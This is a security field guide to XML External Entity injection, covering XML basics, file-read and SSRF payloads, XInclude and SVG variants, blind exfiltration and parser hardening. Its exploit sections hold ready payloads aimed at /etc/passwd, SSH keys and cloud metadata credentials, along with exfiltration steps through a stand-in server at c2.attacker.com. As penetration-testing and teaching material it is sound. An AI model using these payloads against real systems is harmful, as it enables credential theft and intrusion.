Security Field Guide · XML Attack Surface

XML External Entity
Injection

Step-by-step from XML basics to blind XXE exploitation, SSRF, and remediation. With analogies, payloads, and assessment guidance.

XML Basics — Structure & Purpose

XML (eXtensible Markup Language) is a text format for storing and transporting structured data. Unlike HTML, it has no predefined tags — you invent your own.

Think of XML like a labeled shipping crate system. Every item goes in a box, the box has a label, and boxes can contain other boxes. The structure is entirely up to whoever builds the warehouse.

        XML
        Basic structure
      

<?xml version="1.0" encoding="UTF-8"?>    <!-- XML declaration -->

<order>                                     <!-- root element (exactly ONE) -->
  <customer id="42">                       <!-- element with attribute -->
    <name>Alice</name>
    <email>alice@example.com</email>
  </customer>
  <item qty="3">Widget</item>
</order>

Key Rules

One root element only
All tags must close
Attribute values quoted
Tags are case-sensitive
Proper nesting required

Common Uses

SAML / SSO tokens
SOAP web services
Office file formats (.docx, .xlsx)
SVG images
API responses (legacy)
Config files (Maven, Android)

Schema

A schema defines what's valid: which elements exist, what types they hold, what's required. Think of it as the blueprint the crate-builder must follow.

Formats: XSD (XML Schema Definition), DTD, RelaxNG.

DTD & Entities — The Dangerous Ingredients

A Document Type Definition (DTD) is an older schema format that lives either inside the XML document (internal DTD) or at a URL (external DTD). It defines allowed elements and declares entities — which is where XXE comes from.

An entity is a text macro — like a copy-paste shortcut. You define &company; once, and every time the parser sees it, it substitutes the full value. An external entity fetches that value from a URL or file at parse time.

XMLInternal DTD + entity

<!-- Internal DTD -->
<!DOCTYPE note [
  <!ENTITY author "Alice">
]>

<note>
  Written by &author;   <!-- → "Alice" -->
</note>

XMLExternal entity (XXE vector)

<!DOCTYPE foo [
  <!ENTITY xxe
    SYSTEM "file:///etc/passwd"
  >
]>

<data>&xxe;</data>
<!-- Parser fetches /etc/passwd
     and inlines it here -->

Entity Type	Syntax	Source	XXE Risk
Internal	`<!ENTITY name "value">`	Literal string in DTD	Low
External (file)	`<!ENTITY name SYSTEM "file:///...">`	Local filesystem	Critical
External (HTTP)	`<!ENTITY name SYSTEM "http://...">`	Remote URL	SSRF
Parameter entity	`<!ENTITY % name SYSTEM "...">`	Used inside DTD only	Blind XXE
Character entity	`< &`	Built-in XML escaping	None

When Does Testing for XXE Make Sense?

XXE is relevant wherever an application parses XML that the attacker influences. It's easy to miss because XML is often hidden.

🎯 High-Yield Targets

SOAP endpoints (Content-Type: text/xml)
SAML SSO (SAMLResponse, AuthnRequest)
File upload: .docx, .xlsx, .svg, .xml
APIs accepting application/xml
RSS/Atom feed parsers

🔍 Also Check

JSON endpoints — try changing Content-Type to XML and re-send
PDF generators (often parse SVG/XML internally)
Import/export features (data feeds, configs)
Mobile apps talking to legacy middleware

📋 Assessment Checklist

Identify all XML-accepting endpoints
Check Content-Type headers
Inspect file upload processing
Look for SAML in SSO flows
Test JSON endpoints with XML swap

How Do XXE Vulnerabilities Arise?

XXE exists because most XML parsers support external entities by default. It's a feature, not a bug — until untrusted input hits it.

Imagine a photocopier that can pull documents from any network share and include them in a printout. That's useful internally. But if a visitor hands you an instruction sheet that says "and include the contents of server/secret-plans.docx on page 3" — you have a problem.

Application receives XML

User-controlled data arrives as XML — directly in the body, inside a SOAP envelope, or embedded in a file upload.

Parser processes DOCTYPE without restriction

The XML parser (libxml2, Xerces, .NET XmlDocument, Java SAXParser, etc.) sees a <!DOCTYPE> declaration and — by default — processes it.

External entity is resolved

The parser fetches the external resource (file, URL) and substitutes it into the document tree.

Substituted content ends up in the response

If the application reflects parsed values (e.g., echoes back a field), the attacker sees the file contents. If not → Blind XXE path.

ℹ️

Root cause in one sentence: The application passes attacker-controlled XML to a parser that has external entity processing enabled, then uses the parsed output.

Potential Impact & Limitations

💥 Impact

Local file disclosure — read /etc/passwd, app configs, SSH keys, source code
SSRF — probe internal network, hit cloud metadata endpoints (169.254.169.254)
Blind data exfil — via DNS/HTTP to attacker-controlled server
DoS (Billion Laughs) — nested entity expansion exhausts memory
RCE — rare, but possible via PHP expect:// wrapper

⚠️ Limitations

Files containing <, >, & break XML parsing → need out-of-band or CDATA tricks
Binary files not readable (not valid XML text)
No response reflection → must use blind techniques
WAFs may block SYSTEM keyword or <!DOCTYPE
Modern parsers (hardened) may have XXE disabled by default

⚠️

CDATA workaround for special characters: Wrap fetched content in a CDATA section via a parameter entity trick (see Blind XXE section) to handle files with XML metacharacters.

Exploit: Reading Local Files

The classic flow: inject a DOCTYPE, define an external entity pointing to a local file, reference it in a value the app echoes back.

Find an XML endpoint that reflects input
Look for a field value in the response that mirrors something you sent. E.g., <username>Alice</username> → response contains "Alice".
Inject a DOCTYPE with external entity
Prepend (or replace) the DOCTYPE to declare your entity.
Reference the entity in the reflected field
Put &xxe; where the echoed value was.
Read the response
The file contents appear where the entity was referenced.

XML · BURPBasic file read payload

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&xxe;</productId>   <!-- reflected field -->
  <storeId>1</storeId>
</stockCheck>

RESPONSE (truncated)What you get back

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Other useful file targets:

File	What you get
`/etc/passwd`	User list, shells — confirms XXE works
`/etc/hostname`	Machine name — useful for SSRF targeting
`/proc/self/environ`	Environment variables — often contains secrets
`/proc/self/cmdline`	Running process & args
`~/.ssh/id_rsa`	Private SSH key
`/var/www/html/config.php`	App source, DB credentials
`C:\Windows\win.ini`	Windows confirmation payload
`file:///C:/inetpub/wwwroot/web.config`	IIS config, connection strings

Exploit: SSRF via XXE

Instead of file://, use http://. The server's XML parser makes an outbound HTTP request — from inside the network. You can probe internal services, cloud metadata APIs, or anything the server can reach.

You're standing outside a locked building. You can't enter. But you slip a note under the door saying "call this number for me and read me what they say." XXE SSRF is exactly that: you make the server act as your proxy.

XMLAWS metadata endpoint via SSRF

<!DOCTYPE foo [
  <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&ssrf;</data>

XMLInternal network port scan (one-by-one)

<!-- Try systematically; timing difference reveals open vs. closed -->
<!DOCTYPE foo [
  <!ENTITY ssrf SYSTEM "http://192.168.1.1:8080/">
]>
<data>&ssrf;</data>

High-Value SSRF Targets

169.254.169.254 — AWS/GCP/Azure metadata
http://localhost:8080 — admin panels
http://internal-db:5432 — databases
http://elasticsearch:9200/_cat/indices
http://kubernetes.default.svc — k8s API

SSRF Indicators

Error message mentions connection refused → port closed
Timeout → filtered or no route
HTTP 200 with content → open & responding
Burp Collaborator interaction → confirmed outbound

XXE Without Modifying DOCTYPE — XInclude & SVG

Sometimes you can't inject a DOCTYPE — because you control only part of the XML (e.g., a value inside a SOAP message), or the server regenerates the DOCTYPE. Two alternatives:

XMLXInclude — inject into a value field

<!-- No DOCTYPE needed.
     XInclude uses a namespace. -->
<foo
  xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include
    parse="text"
    href="file:///etc/passwd"/>
</foo>

ℹ️

Works when you can inject XML into any value that gets parsed. parse="text" is key — without it, the parser tries to parse the file as XML.

SVG UploadXXE via SVG image upload

<?xml version="1.0"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg
  xmlns="http://www.w3.org/2000/svg">
  <text y="20">&xxe;</text>
</svg>

<!-- Upload as .svg / image/svg+xml
     Content may appear rendered in browser
     or in response if fetched directly -->

Scenario	Technique	Requirement
Full XML body control	Classic DOCTYPE injection	Parser allows external entities
Control a value inside XML	XInclude	Server supports XInclude processing
File upload (image)	SVG with DOCTYPE	Server parses SVG as XML
DOCX/XLSX upload	Modify embedded XML parts	Server opens/processes the file
JSON that becomes XML	Content-Type swap + classic	Backend converts JSON→XML

Exploiting XXE with C&C Infrastructure & Tooling

For blind XXE exfiltration in real engagements, you need an attacker-controlled server for hosting external DTDs and receiving callbacks. Here's a practical workflow using typical ERNW tooling.

Infrastructure Setup

BASH · C&C ServerServe evil.dtd + log incoming requests

# Minimal Python HTTP server that logs all requests
python3 -m http.server 80

# Or with request logging to file:
python3 -c "
import http.server, sys
class L(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        print(f'[HIT] {self.path}', flush=True)
        self.send_response(200); self.end_headers()
http.server.HTTPServer(('',80),L).serve_forever()
"

BASH · C&C ServerCapture DNS exfil with tcpdump or dnslog

# Listen for DNS queries (your NS for attacker.com must point here)
tcpdump -i eth0 -n udp port 53 | grep attacker.com

# Or use interactsh-client (open source Burp Collaborator alternative)
interactsh-client -v
# gives you: abc123.oast.fun — use as your callback domain

Tooling Overview

Tool	Use Case	Notes
Burp Suite Pro	Intercept, modify, replay XML; Collaborator for blind OOB	Go-to for manual XXE
Burp Collaborator	DNS/HTTP callback server, auto-correlated	Built into Burp Pro; use `oastify.com` domains
interactsh	Open-source Collaborator alternative	`interactsh-client` CLI
XXEinjector	Automated XXE file enumeration & OOB exfil	Ruby; good for bulk file reads
xmllint	Parse & test DTD structure locally	`xmllint --noent payload.xml`
Python requests	Scripted payload delivery	Set `Content-Type: application/xml`

Full Blind Exfil Workflow

Host evil.dtd on C&C

Place evil.dtd on your C&C server. It reads the target file and sends its contents to your listener as a URL parameter.

Send trigger payload to target

XML body references http://c2.attacker.com/evil.dtd via a parameter entity. Target fetches the DTD.

Target evaluates DTD, reads file, sends callback

Your listener receives GET /?data=root:x:0:0:...%0Adaemon:.... URL-decode the parameter to get the file.

Automate with XXEinjector for bulk reads

ruby XXEinjector.rb --host=c2.attacker.com --file=/burp_request.txt --path=/etc/ --oob=http

Prevention

✅

Primary fix: disable external entity processing in your XML parser. Everything else is defense-in-depth.

1. Disable External Entities

Configure your XML parser to reject external entities and DTD processing. This is the direct fix.

2. Use Safe Data Formats

Prefer JSON or YAML for APIs. Less attack surface, no entity concept. Only use XML where necessary.

3. Server-Side Input Validation

Validate that XML conforms to expected schema before parsing. Reject documents with DOCTYPE declarations unless required.

4. Patch & Keep Libraries Current

XML parser libraries regularly patch XXE-related issues. Run npm audit, mvn dependency-check, etc. regularly.

Parser-Specific Hardening

Language / Parser	Safe Configuration
Java (SAXParser)	`factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)`
Java (DocumentBuilder)	`factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`
Python (lxml)	`etree.XMLParser(resolve_entities=False, no_network=True)`
Python (defusedxml)	Drop-in safe replacement: `import defusedxml.ElementTree as ET`
.NET (XmlReader)	`XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit }`
PHP (libxml)	`libxml_disable_entity_loader(true)` (PHP < 8.0; disabled by default in 8.0+)
Node.js (node-expat / libxmljs)	Check for `resolve_entities: false`; prefer `sax` or validated parsers
Ruby (Nokogiri)	`Nokogiri::XML::ParseOptions::NONET \| NOENT`

PYTHONSafe XML parsing with defusedxml

# pip install defusedxml
import defusedxml.ElementTree as ET

# Any XXE/XInclude/entity bomb attempt raises an exception
tree = ET.parse("user_input.xml")    # safe drop-in
root = tree.getroot()

JAVASecure SAX parser setup

SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setFeature(
  "http://apache.org/xml/features/disallow-doctype-decl", true
);
factory.setFeature(
  "http://xml.org/sax/features/external-general-entities", false
);
factory.setFeature(
  "http://xml.org/sax/features/external-parameter-entities", false
);
SAXParser parser = factory.newSAXParser();

🔗

OWASP XML Security Cheat Sheet — cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html — comprehensive parser-by-parser reference.

REF

Quick Payload Reference

Goal	Payload Skeleton
Read local file (inline)	`<!ENTITY x SYSTEM "file:///etc/passwd"> … &x;`
SSRF / internal HTTP	`<!ENTITY x SYSTEM "http://169.254.169.254/...">`
Blind OOB ping	`<!ENTITY x SYSTEM "http://collaborator.id/">`
Blind OOB + file exfil	Parameter entity → external evil.dtd → %file; in URL
Error-based	%file; used in invalid path → error message leaks content
XInclude (no DOCTYPE)	`<xi:include parse="text" href="file:///etc/passwd"/>`
SVG upload	SVG with DOCTYPE + `<text>&xxe;</text>`
DoS (Billion Laughs)	Nested entities: `&lol9;` expands to 10^9 copies of "lol"

XML External Entity
Injection

XML Basics — Structure & Purpose

Key Rules

Common Uses

Schema

DTD & Entities — The Dangerous Ingredients

When Does Testing for XXE Make Sense?

🎯 High-Yield Targets

🔍 Also Check

📋 Assessment Checklist

How Do XXE Vulnerabilities Arise?

Potential Impact & Limitations

💥 Impact

⚠️ Limitations

Exploit: Reading Local Files

Exploit: SSRF via XXE

High-Value SSRF Targets

SSRF Indicators

Blind XXE — Out-of-Band Exfiltration & Burp Collaborator

Step 1 — Confirm Blind XXE with DNS ping

Step 2 — Exfiltrate file data via parameter entities + external DTD

Step 3 — Error-based XXE (no OOB needed)

XXE Without Modifying DOCTYPE — XInclude & SVG

Exploiting XXE with C&C Infrastructure & Tooling

Infrastructure Setup

Tooling Overview

Full Blind Exfil Workflow

Prevention

1. Disable External Entities

2. Use Safe Data Formats

3. Server-Side Input Validation

4. Patch & Keep Libraries Current

Parser-Specific Hardening

Quick Payload Reference